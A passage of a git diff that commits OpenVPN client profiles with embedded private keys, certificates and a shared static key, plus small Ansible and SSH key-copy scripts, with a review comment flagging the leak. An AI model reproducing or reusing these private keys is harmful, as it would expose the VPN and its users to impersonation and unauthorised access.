+hkiG9w0BAQsFAAOCAQEAZTUmbIInXSV12DdxLOmgmiCH9BtDvXswyEfD4xMyspDT +f3SbXBiSJgfMMMys9QrLYZ06Rg+tNxGoYX7fPjiLcH5UlB3muGMNFyrL6y1mJ1C/ ++evvYjWnm6ATT6uigW0IO6mzNie3FDSitSXvZAwv+9mskuoes2I5C7EKYrixfIyN +hRfI5JYbQgTB9FI6qrrFAinnJcynWAOjoyMabfUrUme/wiKtNCzPqmmwUYh5i7+H +tfiZQ7Qkshv4VQxkq2dmq4VAPx0cuHrjVQ8ZfHhNZcX2HNsynP2KZJKLXe1pn5pg +J0D5kG11BAA8e5LNMXl42KNuQyZCh2LClkwz4Sx2Rw== +-----END CERTIFICATE----- + +key-direction 1 + +# +# 2048 bit OpenVPN static key +# +-----BEGIN OpenVPN Static key V1----- +d4d47aea6be3bda4549f485b7c38d287 +312509957ccf26428848e3095c429eee +99196bd9edb0da94b5c9209debd8d455 +41bce3ed5f5631031775359d49e49d87 +8af81b53e7f909d1b47a1fbc03e2206b +98bf518e41a43da80a652e19e39dae39 +7fa5ab1a7aff1b141b1952c1f61296b1 +363fc7a891a21acc354253e9a6a5123f +8e36e40b486b7ba40542f77749b45bf5 +27b5899c26333e11a18e90a6857f3c36 +49abe06d3afabee6f97cbc65fcc6e74e +6db46cd53e71ef4412b7328a278e9de2 +d50adaf4c942600aba4c011fa04d1368 +87ffd6f73adc9b7a772efb570e59f798 +e8cdd96c8dbc018535c3e04170dd309d +1809e77f2f216d6fc95d706ae5400eab +-----END OpenVPN Static key V1----- + + diff --git a/project/sec_vpn_3.ovpn b/project/sec_vpn_3.ovpn new file mode 100644 index 0000000..1686f65 --- /dev/null +++ b/project/sec_vpn_3.ovpn 
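Review bot: The client's private key is embedded in this profile (the `-----BEGIN PRIVATE KEY-----` block) and committed with it, so the key and the certificate issued for `sec_vpn_2` should be treated as disclosed; project/sec_vpn_3.ovpn, sec_vpn_4.ovpn and sec_vpn_5.ovpn do the same. Every profile also carries the identical `OpenVPN Static key V1` block (presumably the tls-auth key, given `key-direction 1`), so one leaked file exposes the shared key for all clients. I would revoke and reissue these client certificates, regenerate the static key, and keep generated profiles out of version control with an ignore rule such as `project/*.ovpn`, handing each profile to its client separately. Separately, `comp-lzo` turns on tunnel compression, which current OpenVPN releases deprecate; drop that line unless the server side requires it.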
@@ -0,0 +1,110 @@ + +client +nobind +dev tun +comp-lzo +resolv-retry infinite +keepalive 15 60 +remote-cert-tls server +remote 192.168.1.5 1194 udp +float + + +-----BEGIN PRIVATE KEY----- +MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQCyvOI9Tz8JQoLP +bLhXTTdvxGqQMqc1HDRuOWsskMI7IIaUopR+maakYheorvcvf+f2EUwCvHGYnrwb +gGSNWIm+Clh1/zwuDsWvMTOBND3UYnIjpqbc5A5Pa++8gG+HsG9bBP2aFn8wMJKZ +rnfrxDyXiBi+40oEZgbzgmC0TvTwuUDYG+IivA754kDcHrzB+AJPLYAy89Hdr2pi +PE47LBc2v64wiq3mXwiEHqiHwulMTr21ozq2D78WaZkJkIbe8A8rnn2c+RoYBM4X +a+fPafW/KxJS1cADjR6QF8tr79zDSYfCeL9h//Or00Pl17vJrWk1r6fT9OdytM5C +S+C/dEI3AgMBAAECggEBAJNT5hgrLgZv8GsRbpFncH6MJFpfpju81+rTIWhGmhMq +qEP0DvqbpCRzRpUgQ1e/0m+dqk3HDsuCbAMvPbLUfBVNacU5cV11h7T0lUO20BA0 +ZWjFgV0qDjGhAqcaJtRtthwMbQ2J5aTPJMfQa8DGrDsrT1po9yXRA4HMwfFd88BH +UXRIHQrwnNsC5FPwxINMFRHFklQGBb+AuS0SdEQp2R3DTU30kb+146HQs2vWmu3C +5EwRDaePKwQIbm1BYMakSYvt9WB5Gd5Z/WG8F9e+lIhaIgufdsZW1H+ktjM21hRt +8Y93wE8BHiXXcJh9u1CeaqysnUTp7r4cgh5ISL7uOWECgYEA5lfLEqO+VRegnXhf +70dG6NavmwIgxbcs2951CSPT3fRQc/Llft+jjuoa4aciVKZ1xTWcXITVDCwWeaOR +wvzcEHtuMyxqfe15HAQrCpvAwn9WxOPevtdH2QPz5Lvd0iqdDQLTOHQNqmFjImNo +VCHwM5WN05cgqAI1+7gx9OU0OhMCgYEAxqWTW8shGU9Pplovs7yeJE3/vjWxxXm3 +ASu1+ckpCUirQ/C2kVSa5JJHdnHghl9NyVLeDDIKXjR7o4hEuNAQnqzkhIcymxHA +ghR/WrW5ojj0Yi6Qer9v2itTleXczpXZZUinZ57CvUSmH/SYhXFdgRfrCYP5epnI +9UDmpmuvW80CgYBgyMjSBy1FMc1R/S9KKgfYc8SLfCRrDyFxLRK+CWjPXQWlAo19 +dtiRhzpOUFyzdtILUBBoK4QdPjUfXSQ06uxInKRcKjCAwxRdOj8fkPw4fSrnRdvl +Ei3lOKz1Eh8NXMxqmCJKGTFYwtzVqTFAEJaOBiv2mQymq28lWmrbPKdqMwKBgCyl +xmsZSsUviE1xc8tIF5s9VL/hvaUO6E0BEBOmXOzTQnswvTgI9g9tuVYr3jUVcpxP +Xc0L6jymOyvUUu3fBf1ECtCmun8UDFqwVLeEpMaLWpI+uQZ9xJwapNzKH0jncUdM +fyPRESANL/F6vlUv175OK+ulmAswSXSmM7Ev/uf5AoGAMw+Nmo7AvM707XCfF2Sh +HAuPYDZ2nw+Oymx1+Uo2SIXp6WjDvZ60VN5hCKFwU4PM6VNBiypEkjgF99Ix4mBH +2NleTGuJ4BgDJWMxJUEEDgqii4EisuMidebf1toeMp2anpFSFN0NTpLxDRstXoIs +TyUSfCwVyaichIb10Pb7fjs= +-----END PRIVATE KEY----- + + +-----BEGIN CERTIFICATE----- +MIIDWDCCAkCgAwIBAgIRAOIdNBnDWhtdfZSO1oMj4YYwDQYJKoZIhvcNAQELBQAw 
+FjEUMBIGA1UEAwwLRWFzeS1SU0EgQ0EwHhcNMjEwMTIzMDQ1MjEzWhcNMjQwMTA4 +MDQ1MjEzWjAUMRIwEAYDVQQDDAlzZWNfdnBuXzMwggEiMA0GCSqGSIb3DQEBAQUA +A4IBDwAwggEKAoIBAQCyvOI9Tz8JQoLPbLhXTTdvxGqQMqc1HDRuOWsskMI7IIaU +opR+maakYheorvcvf+f2EUwCvHGYnrwbgGSNWIm+Clh1/zwuDsWvMTOBND3UYnIj +pqbc5A5Pa++8gG+HsG9bBP2aFn8wMJKZrnfrxDyXiBi+40oEZgbzgmC0TvTwuUDY +G+IivA754kDcHrzB+AJPLYAy89Hdr2piPE47LBc2v64wiq3mXwiEHqiHwulMTr21 +ozq2D78WaZkJkIbe8A8rnn2c+RoYBM4Xa+fPafW/KxJS1cADjR6QF8tr79zDSYfC +eL9h//Or00Pl17vJrWk1r6fT9OdytM5CS+C/dEI3AgMBAAGjgaIwgZ8wCQYDVR0T +BAIwADAdBgNVHQ4EFgQUU3rhoIYQLsaMIugbI8eAgikHQwswUQYDVR0jBEowSIAU +KlyCEGrvQQZ90ywWAgGIFN3kga6hGqQYMBYxFDASBgNVBAMMC0Vhc3ktUlNBIENB +ghRRbPy2wgF5KGujBMDYrBlsIPEx/jATBgNVHSUEDDAKBggrBgEFBQcDAjALBgNV +HQ8EBAMCB4AwDQYJKoZIhvcNAQELBQADggEBAI3x+wAZ7wV7mdA4uLIPP6I72FED +gueB1cCkvFOXmrj0EGEKnQAOHlOQHX4BPkE+ZSUdzXRzt4+rN01OeE6NSG+SANKW +8rO5hYceP8sgMpgJ69on8uvKq2a/4kIWvs+lCGJCZ6oDBTMkZWoaKpnONjtrRzP9 +hzHhznaKvHMsDkWf+W1IR9MYJ25JjhEsV4WUrVuLRXNTc5/RlEafHipsFNI3cJkW +pMXFwEpTyMp5pe/AGyM7Ih7u9hBUbyTnUuJUtFU4IS3Sbg8nO4srwKRJsM6GIIy6 +jMGHfTeXDtYMb9xPeLc5jEKuYKY4J0cEYLBjFEN3ysczwl2ow3esjdC6qhs= +-----END CERTIFICATE----- + + +-----BEGIN CERTIFICATE----- +MIIDSzCCAjOgAwIBAgIUUWz8tsIBeShrowTA2KwZbCDxMf4wDQYJKoZIhvcNAQEL +BQAwFjEUMBIGA1UEAwwLRWFzeS1SU0EgQ0EwHhcNMjEwMTIzMDQ0NjM5WhcNMzEw +MTIxMDQ0NjM5WjAWMRQwEgYDVQQDDAtFYXN5LVJTQSBDQTCCASIwDQYJKoZIhvcN +AQEBBQADggEPADCCAQoCggEBAMlIgHdUbLlWaB+AFKC1KeIe2u9ZOq3LsY4esghm +43CgwxtrKRw87QV46RGGQmPoeKdp2Qe8im232nl1odr3r1O6/ohknTP02Q38zGBH +NyQF4cORiMHiYdS2XG0NUkf1vN0WlmwbYJHdxhGcs0/D0DGf5yY6t+j14o6xvJjX +4h4SQAfGm1p0AbEuoahY5Or4stFkUMxnUkIpZp8nGRTy+4ZMpYjOGRcaoaHQNDTX +/nPsS3AXrp5EZfZ9HIbJ68JtmUIPY803tvubDQx3C7CeiPGc/KfW7D/0SbKxh9Nk +Er25NLm8MBNQJjSs1fRMg6FlIFvR48+s446LtdWGfHedz4kCAwEAAaOBkDCBjTAd +BgNVHQ4EFgQUKlyCEGrvQQZ90ywWAgGIFN3kga4wUQYDVR0jBEowSIAUKlyCEGrv +QQZ90ywWAgGIFN3kga6hGqQYMBYxFDASBgNVBAMMC0Vhc3ktUlNBIENBghRRbPy2 +wgF5KGujBMDYrBlsIPEx/jAMBgNVHRMEBTADAQH/MAsGA1UdDwQEAwIBBjANBgkq 
+hkiG9w0BAQsFAAOCAQEAZTUmbIInXSV12DdxLOmgmiCH9BtDvXswyEfD4xMyspDT +f3SbXBiSJgfMMMys9QrLYZ06Rg+tNxGoYX7fPjiLcH5UlB3muGMNFyrL6y1mJ1C/ ++evvYjWnm6ATT6uigW0IO6mzNie3FDSitSXvZAwv+9mskuoes2I5C7EKYrixfIyN +hRfI5JYbQgTB9FI6qrrFAinnJcynWAOjoyMabfUrUme/wiKtNCzPqmmwUYh5i7+H +tfiZQ7Qkshv4VQxkq2dmq4VAPx0cuHrjVQ8ZfHhNZcX2HNsynP2KZJKLXe1pn5pg +J0D5kG11BAA8e5LNMXl42KNuQyZCh2LClkwz4Sx2Rw== +-----END CERTIFICATE----- + +key-direction 1 + +# +# 2048 bit OpenVPN static key +# +-----BEGIN OpenVPN Static key V1----- +d4d47aea6be3bda4549f485b7c38d287 +312509957ccf26428848e3095c429eee +99196bd9edb0da94b5c9209debd8d455 +41bce3ed5f5631031775359d49e49d87 +8af81b53e7f909d1b47a1fbc03e2206b +98bf518e41a43da80a652e19e39dae39 +7fa5ab1a7aff1b141b1952c1f61296b1 +363fc7a891a21acc354253e9a6a5123f +8e36e40b486b7ba40542f77749b45bf5 +27b5899c26333e11a18e90a6857f3c36 +49abe06d3afabee6f97cbc65fcc6e74e +6db46cd53e71ef4412b7328a278e9de2 +d50adaf4c942600aba4c011fa04d1368 +87ffd6f73adc9b7a772efb570e59f798 +e8cdd96c8dbc018535c3e04170dd309d +1809e77f2f216d6fc95d706ae5400eab +-----END OpenVPN Static key V1----- + + diff --git a/project/sec_vpn_4.ovpn b/project/sec_vpn_4.ovpn new file mode 100644 index 0000000..5dff95e --- /dev/null +++ b/project/sec_vpn_4.ovpn 
@@ -0,0 +1,110 @@ + +client +nobind +dev tun +comp-lzo +resolv-retry infinite +keepalive 15 60 +remote-cert-tls server +remote 192.168.1.5 1194 udp +float + + +-----BEGIN PRIVATE KEY----- +MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQCUA5v4Y7WOoL68 +06Vz7RcRQOwF5zTYXbwjk1ITvC2zYkTkaDbxNCoeVysl9HZ1v0jOmPr/iGIAFPcx +CbQkr4xTp9ZU7q1GcKEvvTu4f392XaRwVZFfWSW6DFbNVa11BogtzOym6+t6Datk +NP+2Luo2vV4fHwqSXI8DYcNijxkULtUvwZowdJhSiptA6uGZi9FlS0DKx3ux2VK3 +ji87WhyxD0ocdHDPh21Mz1cNJlxlfPSw51guc5JXRjyw6Jp4iJ+JbFfGJYn2wz3L +CLn6iQKbdQV1p1sXcnjatYeXcglBTtwPu2a0O+E06BLFhAxBrlEpgsKN1RvCr8UA +2vFPYMnXAgMBAAECggEBAJOgKe8K2+l+j97bpTjDbu9pdj7JBJ8MlnpRFFrUpCw3 +RgkdnDbk1WFfhYycj44PE/njAOzexQfZ4VYKnJ6+bFJ/orkhOLd53Ho13hu9Jo8T +BNB5t72Gt6chaW3xF0kSE77ClgJCaaFZguk2Jxk5H6crJnYZyryCDq3L00k4+kVy +kCMeXGzCrlBxtucYQbVGm7F6SUQEXvyv2eCStRuwVu2gnHqckrnX1HkQ3fNmmaIv +8tqCbqbh5JBu+6l4R0xOArOGCIORNlQC5xtXFevwV7o6ZCGf64n9vvkJ02lgosUp +EUmdoAxha2CKeH3BA/ZKH8VxyfZuNgFD1/avQXQ+RWkCgYEAxJ5xfSvcvkY32HEA +6UNAUOdSLXCM+mJR0MKE+zFGAqx9auHKasOk+IKo9v/4/PgZnSjyI3WzHQ2GmJqO +iLZrCJWr60ictoBDw62ZbVWuRoJUwAYe+icLoQC/fBIuwJRXnBqGqIH0jTLnQG+O +69rSFVfEWwLPTVxSFuYI8h9DOJsCgYEAwLdK/Axy/lpy6vHphTvgihNJ1Y2lNpWO +cgb4mURMixojvY7zRaLxzbmpBU1KpfK0z+jorjGTnuQ2RTuJ9/xRKGRd6aaJfQKG +x+AiKNrslltYYo74U42Mhw810Kq/RlmdvLfb2ify9eUtuEtWhr7q95mbWLfmnCBP +CRgR8ML68XUCgYEAvx3f5LK4+/7XE70sDJEBOGLRfzey4UKmkkwx5NTNX5X4xua4 +0bRga+rdgFHp3ULv6tK9IviqZOgb18QMHhlqysppdOd85OyicdcRlrQ9FW5kIM8S +V0eSxyop9tjZtvm6exNRpwPDCWjcXcbSXrGxmWtZgrmldWXyqS1qrqbyuVcCgYBN +IM6E46KeQ6rcducj6JvsBt409tSZbO+umTWjeZ88yMBnHDAmvZkS4exQb+ehVOqi +jy+Yj8TqAaHqwXJtanE8vjaLzZgXDQzOL9jcCwpG/tX31Ap0viDw6Nh74+pbiIBF +yDvYKsblPMy4hoZhtUUqxTJUJn3IHHIlTJnZht+SBQKBgF4lQMpf1acfm4aODCS9 +WIArMeifjSf2m1X4qmKf+hWkha7Aq4JHAVNDCF77ktLjo72la/647PPn1Yt1tgNE +T34bY/+iTyLmOULD3EPwSKU+MsVXWUnDn6gksEix+4qCxGVR9U5g/rJc0isAMr4R +X0zX3DnM7OioFwjGVjmw4OlP +-----END PRIVATE KEY----- + + +-----BEGIN CERTIFICATE----- +MIIDWDCCAkCgAwIBAgIRALIrjDtKnvOlKzrDEsEquO0wDQYJKoZIhvcNAQELBQAw 
+FjEUMBIGA1UEAwwLRWFzeS1SU0EgQ0EwHhcNMjEwMTIzMDQ1MjIxWhcNMjQwMTA4 +MDQ1MjIxWjAUMRIwEAYDVQQDDAlzZWNfdnBuXzQwggEiMA0GCSqGSIb3DQEBAQUA +A4IBDwAwggEKAoIBAQCUA5v4Y7WOoL6806Vz7RcRQOwF5zTYXbwjk1ITvC2zYkTk +aDbxNCoeVysl9HZ1v0jOmPr/iGIAFPcxCbQkr4xTp9ZU7q1GcKEvvTu4f392XaRw +VZFfWSW6DFbNVa11BogtzOym6+t6DatkNP+2Luo2vV4fHwqSXI8DYcNijxkULtUv +wZowdJhSiptA6uGZi9FlS0DKx3ux2VK3ji87WhyxD0ocdHDPh21Mz1cNJlxlfPSw +51guc5JXRjyw6Jp4iJ+JbFfGJYn2wz3LCLn6iQKbdQV1p1sXcnjatYeXcglBTtwP +u2a0O+E06BLFhAxBrlEpgsKN1RvCr8UA2vFPYMnXAgMBAAGjgaIwgZ8wCQYDVR0T +BAIwADAdBgNVHQ4EFgQUNdDrzlEMV2SXtnLJ7Z/lzuq33mkwUQYDVR0jBEowSIAU +KlyCEGrvQQZ90ywWAgGIFN3kga6hGqQYMBYxFDASBgNVBAMMC0Vhc3ktUlNBIENB +ghRRbPy2wgF5KGujBMDYrBlsIPEx/jATBgNVHSUEDDAKBggrBgEFBQcDAjALBgNV +HQ8EBAMCB4AwDQYJKoZIhvcNAQELBQADggEBAAfcg0QmBzR0ACiFzCAa7cpJ3Lzt +/v7ooR9zUUJ40KkglWA0cAZaEhRRwpFzqYwKKmEgzWQtHTvS0sM/674RGA4FredV +iYYgZdmnxIvDAiWMIL765iK0NCK/qLdPTLfmELDJlf3bOCN/s8QwazUKbUPgWZJF +QsGMFuB+xXDFaYLQt/vO+aHxpDUe7mB4CNL4tUkejq16LMhJ2XQShfVqAJ0IhrX7 +NmMDYK+qf788oTBABB6ROJTySJAgeQ34XGBYbKKdK6UMqi7VIkW5BNfAhusdFkhE +zep52EcL95JGXaCO/NAwdsVmYZMiko/GD8Ks0XrXO+HZLc9DUlLtOBcvfVY= +-----END CERTIFICATE----- + + +-----BEGIN CERTIFICATE----- +MIIDSzCCAjOgAwIBAgIUUWz8tsIBeShrowTA2KwZbCDxMf4wDQYJKoZIhvcNAQEL +BQAwFjEUMBIGA1UEAwwLRWFzeS1SU0EgQ0EwHhcNMjEwMTIzMDQ0NjM5WhcNMzEw +MTIxMDQ0NjM5WjAWMRQwEgYDVQQDDAtFYXN5LVJTQSBDQTCCASIwDQYJKoZIhvcN +AQEBBQADggEPADCCAQoCggEBAMlIgHdUbLlWaB+AFKC1KeIe2u9ZOq3LsY4esghm +43CgwxtrKRw87QV46RGGQmPoeKdp2Qe8im232nl1odr3r1O6/ohknTP02Q38zGBH +NyQF4cORiMHiYdS2XG0NUkf1vN0WlmwbYJHdxhGcs0/D0DGf5yY6t+j14o6xvJjX +4h4SQAfGm1p0AbEuoahY5Or4stFkUMxnUkIpZp8nGRTy+4ZMpYjOGRcaoaHQNDTX +/nPsS3AXrp5EZfZ9HIbJ68JtmUIPY803tvubDQx3C7CeiPGc/KfW7D/0SbKxh9Nk +Er25NLm8MBNQJjSs1fRMg6FlIFvR48+s446LtdWGfHedz4kCAwEAAaOBkDCBjTAd +BgNVHQ4EFgQUKlyCEGrvQQZ90ywWAgGIFN3kga4wUQYDVR0jBEowSIAUKlyCEGrv +QQZ90ywWAgGIFN3kga6hGqQYMBYxFDASBgNVBAMMC0Vhc3ktUlNBIENBghRRbPy2 +wgF5KGujBMDYrBlsIPEx/jAMBgNVHRMEBTADAQH/MAsGA1UdDwQEAwIBBjANBgkq 
+hkiG9w0BAQsFAAOCAQEAZTUmbIInXSV12DdxLOmgmiCH9BtDvXswyEfD4xMyspDT +f3SbXBiSJgfMMMys9QrLYZ06Rg+tNxGoYX7fPjiLcH5UlB3muGMNFyrL6y1mJ1C/ ++evvYjWnm6ATT6uigW0IO6mzNie3FDSitSXvZAwv+9mskuoes2I5C7EKYrixfIyN +hRfI5JYbQgTB9FI6qrrFAinnJcynWAOjoyMabfUrUme/wiKtNCzPqmmwUYh5i7+H +tfiZQ7Qkshv4VQxkq2dmq4VAPx0cuHrjVQ8ZfHhNZcX2HNsynP2KZJKLXe1pn5pg +J0D5kG11BAA8e5LNMXl42KNuQyZCh2LClkwz4Sx2Rw== +-----END CERTIFICATE----- + +key-direction 1 + +# +# 2048 bit OpenVPN static key +# +-----BEGIN OpenVPN Static key V1----- +d4d47aea6be3bda4549f485b7c38d287 +312509957ccf26428848e3095c429eee +99196bd9edb0da94b5c9209debd8d455 +41bce3ed5f5631031775359d49e49d87 +8af81b53e7f909d1b47a1fbc03e2206b +98bf518e41a43da80a652e19e39dae39 +7fa5ab1a7aff1b141b1952c1f61296b1 +363fc7a891a21acc354253e9a6a5123f +8e36e40b486b7ba40542f77749b45bf5 +27b5899c26333e11a18e90a6857f3c36 +49abe06d3afabee6f97cbc65fcc6e74e +6db46cd53e71ef4412b7328a278e9de2 +d50adaf4c942600aba4c011fa04d1368 +87ffd6f73adc9b7a772efb570e59f798 +e8cdd96c8dbc018535c3e04170dd309d +1809e77f2f216d6fc95d706ae5400eab +-----END OpenVPN Static key V1----- + + diff --git a/project/sec_vpn_5.ovpn b/project/sec_vpn_5.ovpn new file mode 100644 index 0000000..b9e0159 --- /dev/null +++ b/project/sec_vpn_5.ovpn 
@@ -0,0 +1,110 @@ + +client +nobind +dev tun +comp-lzo +resolv-retry infinite +keepalive 15 60 +remote-cert-tls server +remote 192.168.1.5 1194 udp +float + + +-----BEGIN PRIVATE KEY----- +MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQCg9D/IFmmR74x7 +kTMBpnz7/xRczL1SLcvqk2EgCwFsHHHvtEEu/wdEgJLKoaF4gTpPQ4NaZ51e5XsG +d7CHwg9B4EW5bydfw16L9V7X54C/Abpo/LS/kT1sLbBMxR5nLuU0WarokE1ivQ2q +gOFsrlPfvYDkhuxGZ6TBMZR4WQC10D6AgPWXF3L0Ld3GlxzzKNDe6zwynEVnNw2w +LO0KmZ6i5x2dkvcMn3zwgEy1RTS2OF6U9qpWadmjSsND7caR4Am4XKSYNuI4Dsyz +QJEMctbOrMTTeNIYJKuAnX1Yp4dXK5cN7YT5hnJfnBr1H3vkmUh1oaYBToOQhLCM +rwjgvTH3AgMBAAECggEAPxU74loWamIu90dDbIQqPEIPYwfDs+/LGldFG9/0YMEN +TtuhKKA/4vNZlR2gQbC0f9iAJPCzVzwt6a0DfVHr1O/no/QSxI+4ALbcw1Yyuaod +u4Q/+00be8i0boJblillIA181MWp7ucV8hutPoFc0jZdzDOtazK3+hhKjpijlJ44 +lBPRcbQGEPrYs2TEEJ0hWHwr0himlId2lC11wygcu1n4TdsoFAScccPVpCbqOKrq +SwbBeaC+HWO6J30b3dsQ38ZOygMdB9cen2ItQAZdW6aIqgSu6gF/2IhM3JACPuO9 +VJj56FAeetZgLwO6c9Vii98UO2Hm+HFhyI9WnAaOoQKBgQDQi2EyGnvJe6WsfLoh +OCh3vvM4F5pdo98cRhrm/SvhyF/OvL8H50hbJtDs4fEWGgJIV8xOk+NSrqJX20k7 +Thpge7EMRqZjkXlZvKIq+9w+aBDKyb1kmuO/BadJh/Zlt9h1jctEc00IPzypfip1 +NiPQe9Vd0NZeL1dFWnoxMhr2/wKBgQDFlIZNzo7eBjT5rEcm7nn63Ylsq+p6LezP +1KwBx9f7XnVU+r8GansvrWrPgqyJ7w/EGHA3/wUk9qw2HZoqUh1W2GpPBYpx0wNV +1g9kjEG056gnFMgTbMjojZ4auxiEFSYo5G8Mi8kLS6OQbUAotieWJFGiCvlUGWUh +Gwh1vNB9CQKBgFG6jfjo0CKCRsd2iiuCqrljKEaPWXvhQQr/noNwLMZrlMCcz/D0 +/zJZ3/81/RnAT6yyW+tfofNBZXYxBl4rmcK+NwCsn4Dd/kTg3F0kH4iFmC8hKQxI +d4DhYlI66qGqjzZiv4qv9TyKK+fw/gq5kQefwFroAVsgCn+vmbu1+0NZAoGAYHqw +Qlo1BVG+mJR5ghc9VTTMoFYqf1LhqnLNM2lknAh5/u8aTIW+dX+XApFqs0gbSMQu +OAm9d1lEqoA2AahrTzcKYl/wRLinjkii55RdmXrtb3gEYwfh6z0MET1/MTAqnBk/ +6L5xg6SB0Eqo47hfCD/f5OK68UgdS9cpgGSc4hECgYAH2bc7xDulyt5tIknzTfRv +iwTipQBJPyK+OGamw83B9l/1I+QJ9EmB+Zn7JmPiWqhViD9V5GlmbUBqiarJXF5Z +mW7VY2BsLsKOuGKprcJO83XpM8LtW6bBlCtfU8hAHeoBX0j8F99isN5ZmwnEHLLY +awaMoHH/Znwdrgg2E7NBwA== +-----END PRIVATE KEY----- + + +-----BEGIN CERTIFICATE----- +MIIDWDCCAkCgAwIBAgIRAOKsUA1kgRB5+57ZaH6Wb7UwDQYJKoZIhvcNAQELBQAw 
+FjEUMBIGA1UEAwwLRWFzeS1SU0EgQ0EwHhcNMjEwMTIzMDQ1MjI4WhcNMjQwMTA4 +MDQ1MjI4WjAUMRIwEAYDVQQDDAlzZWNfdnBuXzUwggEiMA0GCSqGSIb3DQEBAQUA +A4IBDwAwggEKAoIBAQCg9D/IFmmR74x7kTMBpnz7/xRczL1SLcvqk2EgCwFsHHHv +tEEu/wdEgJLKoaF4gTpPQ4NaZ51e5XsGd7CHwg9B4EW5bydfw16L9V7X54C/Abpo +/LS/kT1sLbBMxR5nLuU0WarokE1ivQ2qgOFsrlPfvYDkhuxGZ6TBMZR4WQC10D6A +gPWXF3L0Ld3GlxzzKNDe6zwynEVnNw2wLO0KmZ6i5x2dkvcMn3zwgEy1RTS2OF6U +9qpWadmjSsND7caR4Am4XKSYNuI4DsyzQJEMctbOrMTTeNIYJKuAnX1Yp4dXK5cN +7YT5hnJfnBr1H3vkmUh1oaYBToOQhLCMrwjgvTH3AgMBAAGjgaIwgZ8wCQYDVR0T +BAIwADAdBgNVHQ4EFgQUOCps54FTjSKrRlht5Wq5H5cktQUwUQYDVR0jBEowSIAU +KlyCEGrvQQZ90ywWAgGIFN3kga6hGqQYMBYxFDASBgNVBAMMC0Vhc3ktUlNBIENB +ghRRbPy2wgF5KGujBMDYrBlsIPEx/jATBgNVHSUEDDAKBggrBgEFBQcDAjALBgNV +HQ8EBAMCB4AwDQYJKoZIhvcNAQELBQADggEBAKERF5PiEx71LlLgjtn55HYRUhPI +SYRlcTaaKjONY4fpAM4HQx51Q1GKl8AviTKEHa+j4zqaIVdNj5xnKtv5EdEPcVHp +f7Ifc1D/8D9ulFyaC8M1GyfbUr4rSgfkQDCcn20rdt8ftIfq+MdcBw078/9ql7e1 +w+sD7HgOWR/sOP8tXiHHmy9j9kw/a8SNOROqmjrGl5bRaSkEwDQjoTP28Cqig2Jy +5yXav/Ql6+YlFkCaDyiSbMpVz5PNc09m91ZJvw+ki6Ox/SKDAQGBxx4/M8OkBv3W +YEdf/Bgd4if5nu89zbO0yMoYXRNtzVoquXc59CSAcnIUD9x0qqFCSStlrnE= +-----END CERTIFICATE----- + + +-----BEGIN CERTIFICATE----- +MIIDSzCCAjOgAwIBAgIUUWz8tsIBeShrowTA2KwZbCDxMf4wDQYJKoZIhvcNAQEL +BQAwFjEUMBIGA1UEAwwLRWFzeS1SU0EgQ0EwHhcNMjEwMTIzMDQ0NjM5WhcNMzEw +MTIxMDQ0NjM5WjAWMRQwEgYDVQQDDAtFYXN5LVJTQSBDQTCCASIwDQYJKoZIhvcN +AQEBBQADggEPADCCAQoCggEBAMlIgHdUbLlWaB+AFKC1KeIe2u9ZOq3LsY4esghm +43CgwxtrKRw87QV46RGGQmPoeKdp2Qe8im232nl1odr3r1O6/ohknTP02Q38zGBH +NyQF4cORiMHiYdS2XG0NUkf1vN0WlmwbYJHdxhGcs0/D0DGf5yY6t+j14o6xvJjX +4h4SQAfGm1p0AbEuoahY5Or4stFkUMxnUkIpZp8nGRTy+4ZMpYjOGRcaoaHQNDTX +/nPsS3AXrp5EZfZ9HIbJ68JtmUIPY803tvubDQx3C7CeiPGc/KfW7D/0SbKxh9Nk +Er25NLm8MBNQJjSs1fRMg6FlIFvR48+s446LtdWGfHedz4kCAwEAAaOBkDCBjTAd +BgNVHQ4EFgQUKlyCEGrvQQZ90ywWAgGIFN3kga4wUQYDVR0jBEowSIAUKlyCEGrv +QQZ90ywWAgGIFN3kga6hGqQYMBYxFDASBgNVBAMMC0Vhc3ktUlNBIENBghRRbPy2 +wgF5KGujBMDYrBlsIPEx/jAMBgNVHRMEBTADAQH/MAsGA1UdDwQEAwIBBjANBgkq 
+hkiG9w0BAQsFAAOCAQEAZTUmbIInXSV12DdxLOmgmiCH9BtDvXswyEfD4xMyspDT +f3SbXBiSJgfMMMys9QrLYZ06Rg+tNxGoYX7fPjiLcH5UlB3muGMNFyrL6y1mJ1C/ ++evvYjWnm6ATT6uigW0IO6mzNie3FDSitSXvZAwv+9mskuoes2I5C7EKYrixfIyN +hRfI5JYbQgTB9FI6qrrFAinnJcynWAOjoyMabfUrUme/wiKtNCzPqmmwUYh5i7+H +tfiZQ7Qkshv4VQxkq2dmq4VAPx0cuHrjVQ8ZfHhNZcX2HNsynP2KZJKLXe1pn5pg +J0D5kG11BAA8e5LNMXl42KNuQyZCh2LClkwz4Sx2Rw== +-----END CERTIFICATE----- + +key-direction 1 + +# +# 2048 bit OpenVPN static key +# +-----BEGIN OpenVPN Static key V1----- +d4d47aea6be3bda4549f485b7c38d287 +312509957ccf26428848e3095c429eee +99196bd9edb0da94b5c9209debd8d455 +41bce3ed5f5631031775359d49e49d87 +8af81b53e7f909d1b47a1fbc03e2206b +98bf518e41a43da80a652e19e39dae39 +7fa5ab1a7aff1b141b1952c1f61296b1 +363fc7a891a21acc354253e9a6a5123f +8e36e40b486b7ba40542f77749b45bf5 +27b5899c26333e11a18e90a6857f3c36 +49abe06d3afabee6f97cbc65fcc6e74e +6db46cd53e71ef4412b7328a278e9de2 +d50adaf4c942600aba4c011fa04d1368 +87ffd6f73adc9b7a772efb570e59f798 +e8cdd96c8dbc018535c3e04170dd309d +1809e77f2f216d6fc95d706ae5400eab +-----END OpenVPN Static key V1----- + + diff --git a/project/second_script.sh b/project/second_script.sh new file mode 100755 index 0000000..655a74c --- /dev/null +++ b/project/second_script.sh @@ -0,0 +1,2 @@ +ansible-playbook -u docker -i inventory_w.yml test2.yml -f 4 --ask-pass --ask-become-pass + diff --git a/project/sshkey_script.sh b/project/sshkey_script.sh new file mode 100755 index 0000000..227ec77 --- /dev/null +++ b/project/sshkey_script.sh @@ -0,0 +1,4 @@ +#!/bin/bash +ssh-keygen +ssh-copy-id docker@172.21.0.6 + diff --git a/project/test-ping.retry b/project/test-ping.retry new file mode 100644 index 0000000..75048d0 --- /dev/null +++ b/project/test-ping.retry @@ -0,0 